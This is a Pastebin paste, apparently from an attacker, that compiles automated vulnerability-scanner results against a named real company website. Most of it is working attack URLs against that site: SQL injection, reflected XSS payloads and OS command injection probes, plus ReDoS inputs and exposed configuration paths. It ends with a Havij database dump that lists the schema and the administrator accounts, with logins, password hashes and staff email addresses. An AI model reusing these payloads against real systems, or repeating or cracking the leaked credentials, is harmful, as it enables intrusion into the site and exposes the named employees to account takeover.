Advertisement
sroub3k

atas.cz

Aug 30th, 2011
876
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.02 KB | None | 0 0
  1. WWW.ATAS.CZ SCAN REPORT - NETSPARKER, WEBCRUISER, ACUNETIX, W3AF, HAVIJ
  2.  
  3. |||--- :(Vulnerability Chart - Graf. http://img24.eu/v.php?file=lmusn6r9.jpg):--- |||
  4. ||| ---:(Acunetix Screen - http://img24.eu/v.php?file=o78ltker.jpg):---) |||
  5.  
  6. Basic Information - Server Apache/2.2.17 (Unix) mod_ddmh/0.0.16
  7.  
  8. |||
  9.  
  10. http://www.atas.cz/page.php?sekce=1&menuid=-4 union select 1,2,3, user (),5,6,7
  11. http://www.atas.cz/page.php?sekce=1&menuid=-4 union select 1,2,3, database (),5,6,7
  12.  
  13. |||
  14.  
  15. SQL Injection
  16.  
  17. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  18.  
  19. http://www.atas.cz/page.php?sekce=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&lng=cz
  20. http://www.atas.cz/page.php?sekce=1&menuid=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&lng=en
  21. http://www.atas.cz/products.php?sekce=2&menuid=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&lng=en
  22. http://www.atas.cz/product-detail.php?lng=en&sekce=2&menuid=13&detail=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  23.  
  24. [High Possibility] SQL Injection
  25.  
  26. http://www.atas.cz/page.php?sekce=%27&lng=cz
  27. http://www.atas.cz/page.php?sekce=1&menuid=%27&lng=en
  28. http://www.atas.cz/products.php?sekce=2&menuid=%27&lng=en
  29. http://www.atas.cz/link.php?sekce=1&menuid=%27&lng=cz
  30. http://www.atas.cz/link.php?sekce=1&menuid=NSFTW&lng=cz
  31. http://www.atas.cz/product-detail.php?lng=en&sekce=2&menuid=13&detail=%27
  32.  
  33. Severity : Critical
  34. Confirmation : Confirmed
  35. http://www.atas.cz/admin/login.php
  36. Parameter Name: login
  37. Parameter Type: Post
  38. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  39.  
  40. |||
  41.  
  42. XSS
  43.  
  44. http://www.atas.cz/page.php?sekce='"--></style></script><script>alert(0x000042)</script>&lng=cz
  45. http://www.atas.cz/news.php?lng=en&sekce='"--></style></script><script>alert(0x000077)</script>&menuid=4
  46. http://www.atas.cz/page.php?sekce='"--></style></script><script>alert(0x00007B)</script>&menuid=49&lng=en
  47. http://www.atas.cz/news.php?lng=en&sekce=1&menuid='"--></style></script><script>alert(0x00007C)</script>
  48. http://www.atas.cz/page.php?sekce=1&menuid='"--></style></script><script>alert(0x000082)</script>&lng=en
  49. http://www.atas.cz/article.php?lng=en&sekce='"--></style></script><script>alert(0x0000AF)</script>&menuid=4&article=142
  50. http://www.atas.cz/article.php?lng=en&sekce=1&menuid='"--></style></script><script>alert(0x0000B7)</script>&article=142
  51. http://www.atas.cz/products.php?sekce='"--></style></script><script>alert(0x000210)</script>&menuid=13&lng=en
  52. http://www.atas.cz/products.php?sekce=2&menuid='"--></style></script><script>alert(0x00021A)</script>&lng=en
  53. http://www.atas.cz/job.php?sekce='"--></style></script><script>alert(0x000254)</script>&menuid=7&lng=cz
  54. http://www.atas.cz/job.php?sekce=1&menuid='"--></style></script><script>alert(0x00025B)</script>&lng=cz
  55. http://www.atas.cz/product-detail.php?lng=en&sekce='"--></style></script><script>alert(0x0003B9)</script>&menuid=13&detail=12
  56. http://www.atas.cz/product-detail.php?lng=en&sekce=2&menuid='"--></style></script><script>alert(0x0003C0)</script>&detail=12
  57. http://www.atas.cz:80/article.php?article=142&lng=cz&menuid=" onmouseover=prompt(999125) bad="&sekce=1
  58. http://www.atas.cz:80/article.php?article=141&lng=cz&menuid=" onmouseover=prompt(922971) bad="&sekce=1
  59. http://www.atas.cz:80/article.php?article=139&lng=cz&menuid=" onmouseover=prompt(957364) bad="&sekce=1
  60. http://www.atas.cz:80/article.php?article=138&lng=cz&menuid=" onmouseover=prompt(907063) bad="&sekce=1
  61. http://www.atas.cz:80/article.php?article=136&lng=cz&menuid=" onmouseover=prompt(914207) bad="&sekce=1
  62. http://www.atas.cz:80/article.php?article=142&lng=en&menuid=" onmouseover=prompt(934330) bad="&sekce=1
  63. http://www.atas.cz:80/article.php?article=142&lng=ru&menuid=" onmouseover=prompt(910350) bad="&sekce=1
  64. http://www.atas.cz:80/article.php?article=142&lng=de&menuid=" onmouseover=prompt(909474) bad="&sekce=1
  65. http://www.atas.cz:80/article.php?article=142&lng=cz&menuid=" onmouseover=prompt(948663) bad="&sekce=
  66. http://www.atas.cz:80/article.php?article=142&lng=cz&menuid=4&sekce=" onmouseover=prompt(909068) bad="
  67. http://www.atas.cz:80/article.php?article=141&lng=cz&menuid=4&sekce=" onmouseover=prompt(997244) bad="
  68. http://www.atas.cz:80/article.php?article=139&lng=cz&menuid=4&sekce=" onmouseover=prompt(980711) bad="
  69. http://www.atas.cz:80/article.php?article=138&lng=cz&menuid=4&sekce=" onmouseover=prompt(996406) bad="
  70. http://www.atas.cz:80/article.php?article=136&lng=cz&menuid=4&sekce=" onmouseover=prompt(985287) bad="
  71. http://www.atas.cz:80/article.php?article=142&lng=en&menuid=4&sekce=" onmouseover=prompt(955529) bad="
  72. http://www.atas.cz:80/article.php?article=142&lng=ru&menuid=4&sekce=" onmouseover=prompt(956753) bad="
  73. http://www.atas.cz:80/article.php?article=142&lng=de&menuid=4&sekce=" onmouseover=prompt(951644) bad="
  74. http://www.atas.cz:80/article.php?article=142&lng=cz&menuid=16&sekce=" onmouseover=prompt(954781) bad="
  75. http://www.atas.cz:80/news.php?lng=cz&menuid=" onmouseover=prompt(943739) bad="&sekce=1
  76. http://www.atas.cz:80/news.php?lng=en&menuid=" onmouseover=prompt(955579) bad="&sekce=1
  77. http://www.atas.cz:80/news.php?lng=ru&menuid=" onmouseover=prompt(979814) bad="&sekce=1
  78. http://www.atas.cz:80/news.php?lng=de&menuid=" onmouseover=prompt(901148) bad="&sekce=1
  79. http://www.atas.cz:80/news.php?lng=cz&menuid=" onmouseover=prompt(951045) bad="&sekce=
  80. http://www.atas.cz:80/news.php?lng=cz&menuid=4&sekce=" onmouseover=prompt(979266) bad="
  81. http://www.atas.cz:80/news.php?lng=en&menuid=4&sekce=" onmouseover=prompt(962782) bad="
  82. http://www.atas.cz:80/news.php?lng=ru&menuid=4&sekce=" onmouseover=prompt(901391) bad="
  83. http://www.atas.cz:80/news.php?lng=de&menuid=4&sekce=" onmouseover=prompt(931607) bad="
  84. http://www.atas.cz:80/page.php?lng=cz&sekce=" onmouseover=prompt(994515) bad="
  85. http://www.atas.cz:80/page.php?lng=cz&sekce=" onmouseover=prompt(915970) bad="
  86. http://www.atas.cz:80/page.php?lng=cz&sekce=" onmouseover=prompt(935046) bad="
  87. http://www.atas.cz:80/page.php?lng=cz&sekce=" onmouseover=prompt(944431) bad="
  88.  
  89. Vulnerable URL : http://www.atas.cz/admin/login.php
  90. Parameter Name: login
  91. Parameter Type: Post
  92. Attack Pattern: '"--></style></script><script>alert(0x0003CC)</script>
  93.  
  94. |||
  95.  
  96. Cookie Sql Injection
  97.  
  98. ReferURL http://www.atas.cz/article.php?lng=cz&sekce=1&menuid=4^article=141
  99. Parameter article=141
  100. Type Integer
  101. KWordActionURL Aktuality
  102.  
  103. ReferURL http://www.atas.cz/link.php?lng=cz&sekce=1^menuid=53
  104. Parameter menuid=53
  105. Type Integer
  106. KWordActionURL chataatas
  107.  
  108. |||
  109.  
  110. URL SQL INJECTION
  111.  
  112. ReferURL http://www.atas.cz/article.php?menuid=4&article=141&lng=en&sekce=1
  113. Parameter sekce=1
  114. Type String
  115. KWordActionURL elektromotory
  116.  
  117. ReferURL http://www.atas.cz/article.php?menuid=4&article=141&lng=en&sekce=99999999
  118. Parameter sekce=99999999
  119. Type Integer
  120. KWordActionURL elektromotory
  121.  
  122. ReferURL http://www.atas.cz/index.php?lng=cz&sekce=1&menuid=16
  123. Parameter menuid=16
  124. Type Integer
  125. KWordActionURL Udrzba
  126.  
  127. ReferURL http://www.atas.cz/page.php?sekce=1&menuid=1&lng=cz
  128. Parameter lng=cz
  129. Type String
  130. KWordActionURL elektromotory
  131.  
  132. ReferURL http://www.atas.cz/page.php?lng=cz&sekce=1&menuid=1
  133. Parameter menuid=1
  134. Type String
  135. KWordActionURL error
  136.  
  137. ReferURL http://www.atas.cz/news.php?sekce=1&menuid=4&lng=99999999
  138. Parameter lng=99999999
  139. Type String
  140. KWordActionURL elektromotory
  141.  
  142. http://www.atas.cz/job.php?sekce=1&menuid=7&lng=cz
  143. Parameter lng=cz
  144. Type String
  145. KWordActionURL Kariéra
  146.  
  147. |||
  148.  
  149. ReDoS Vulnerability
  150.  
  151. http://www.atas.cz/results.php?q=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaXX%21&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
  152. http://www.atas.cz/results.php?q=11111111111111111111111111111111199%21&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
  153. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaXX%21&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
  154. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=11111111111111111111111111111111199%21&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
  155. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaXX%21&sa=Hledat&cof=FORID%3A10
  156. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=11111111111111111111111111111111199%21&sa=Hledat&cof=FORID%3A10
  157.  
  158. |||
  159.  
  160. Possible ReDoS Vulnerability
  161.  
  162. http://www.atas.cz/results.php?q=a%40a.aaaaaaaaaaaaaaaaaaaaaaXX%21&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
  163. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=a%40a.aaaaaaaaaaaaaaaaaaaaaaXX%21&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
  164. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=a%40a.aaaaaaaaaaaaaaaaaaaaaaXX%21&sa=Hledat&cof=FORID%3A10
  165. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaXX%21
  166. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=a%40a.aaaaaaaaaaaaaaaaaaaaaaXX%21
  167. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=11111111111111111111111111111111199%21
  168.  
  169. |||
  170.  
  171. OS Commanding Vulnerability
  172.  
  173. http://www.atas.cz/results.php?q=%7Cping%20-c%209%20localhost&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
  174. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=%60ping%20-c%209%20localhost%60&sa=Hledat&cof=FORID%3A10
  175.  
  176. |||
  177.  
  178. Possible OS Commanding Vulnerability
  179.  
  180. http://www.atas.cz/results.php?q=ping%20-n%203%20localhost&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
  181. http://www.atas.cz/results.php?q=ping%20-c%209%20localhost&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
  182. http://www.atas.cz/results.php?q=%2Fusr%2Fsbin%2Fping%20-s%20localhost%201000%2010%20&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
  183. http://www.atas.cz/results.php?q=%26%26ping%20-n%203%20localhost&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
  184. http://www.atas.cz/results.php?q=%26%26ping%20-c%209%20localhost&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
  185. http://www.atas.cz/results.php?q=%26%26%2Fusr%2Fsbin%2Fping%20-s%20localhost%201000%2010%20&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
  186. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=ping%20-n%203%20localhost&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
  187. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=%3Bping%20-n%203%20localhost&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=FORID%3A10
  188. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=ping%20-n%203%20localhost&sa=Hledat&cof=FORID%3A10
  189. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=%7Cping%20-c%209%20localhost&sa=Hledat&cof=FORID%3A10
  190. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=%3Bping%20-n%203%20localhost&sa=Hledat&cof=FORID%3A10
  191. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=%3Bping%20-c%209%20localhost&sa=Hledat&cof=FORID%3A10
  192. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=%3B%2Fusr%2Fsbin%2Fping%20-s%20localhost%201000%2010%20&sa=Hledat&cof=FORID%3A10
  193. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=%60ping%20-n%203%20localhost%60&sa=Hledat&cof=FORID%3A10
  194. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=ping%20-n%203%20localhost
  195. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=ping%20-c%209%20localhost
  196. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=%2Fusr%2Fsbin%2Fping%20-s%20localhost%201000%2010%20
  197. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=%26%26ping%20-n%203%20localhost
  198. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=%26%26ping%20-c%209%20localhost
  199. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=%7Cping%20-n%203%20localhost
  200. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=%7C%2Fusr%2Fsbin%2Fping%20-s%20localhost%201000%2010%20
  201. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=%3Bping%20-n%203%20localhost
  202. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=%3Bping%20-c%209%20localhost
  203. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=%3B%2Fusr%2Fsbin%2Fping%20-s%20localhost%201000%2010%20
  204. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=%60ping%20-n%203%20localhost%60
  205. http://www.atas.cz/results.php?q=Spam%20or%20Eggs%3F&lng=cz&cx=partner-pub-7107733883420188%3Aookocamvvkk&sa=Hledat&cof=run%20ping%20-n%203%20localhost
  206.  
  207. |||
  208.  
  209. PHPinfo page found
  210. This vulnerability affects /phpinfo.php
  211. http://www.atas.cz/phpinfo.php
  212.  
  213. |||
  214.  
  215. Possible sensitive files
  216. This vulnerability affects /.htaccess
  217. http://www.atas.cz/.htaccess
  218.  
  219. |||--- :(Report by Havij):--- |||
  220.  
  221. Host IP: 127.0.0.1 (Proxy IP)
  222. Web Server: Apache/2.2.17 (Unix) mod_ddmh/0.0.16
  223. DB Server: MySQL
  224. Resp. Time(avg):6098 ms
  225. Sql Version: 5.0.44-log
  226. Current DB: atas
  227. System User: atas@10.1.1.17
  228. Host Name: sql3
  229. Installation dir: /usr/
  230.  
  231. Keyword Found: mysqli::query()
  232. Injection type is Integer
  233. Selected Column Count is 2
  234. Valid String Column is 1
  235. Current DB: atas
  236.  
  237. |
  238. Table Name Columns
  239. a4_cisparam id seq type nazev_cz nazev_en nazev_de nazev_ru
  240. a4_item_properties id post_id cisparam_id value_cz value_en value_de value_ru
  241. a4_kariera id zobrazit seq nazev misto popis TypPrVztahu nastup autor vytvoreno zmenil zmeneno
  242. a4_menutree id parent_id nazev_cz seq nazev_en nazev_de nazev_ru url only_cz
  243. a4_posts id menu_id post_id post_date post_type post_title_cz post_text_cz post_title_en post_text_en post_title_de post_text_de post_title_ru post_text_ru post_status date_create date_modify post_end author_id modifier_id seo_url_cz seo_url_en seo_url_de seo_url_ru meta_keywords_cz meta_keywords_en meta_keywords_de meta_keywords_ru meta_desc_cz meta_desc_en meta_desc_de meta_desc_ru
  244.  
  245. a4_users id login passwd name email usertype
  246. |
  247. Count(*) of atas.a4_users is 4
  248. Columns found: login,passwd,email
  249.  
  250. Data Found: login=admin
  251. Data Found: passwd=ac754a330530832ba1bf7687f577da91
  252. Data Found: email=ambroz@atas.cz
  253.  
  254. Data Found: login=salova
  255. Data Found: passwd=bfb4f2296180e4cb2d7a9ecce664be0b
  256. Data Found: email=salova@atas.cz
  257.  
  258. Data Found: login=ambroz
  259. Data Found: passwd=ac754a330530832ba1bf7687f577da91
  260. Data Found: email=ambroz@atas.cz
  261.  
  262. Data Found: login=boruvkova
  263. Data Found: passwd=07a792c523bc5e1295f473eb75d7b745
  264. Data Found: email=boruvkova@atas.cz
  265.  
  266. Statistika
  267. http://navrcholu.cz/Statistika/16643
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement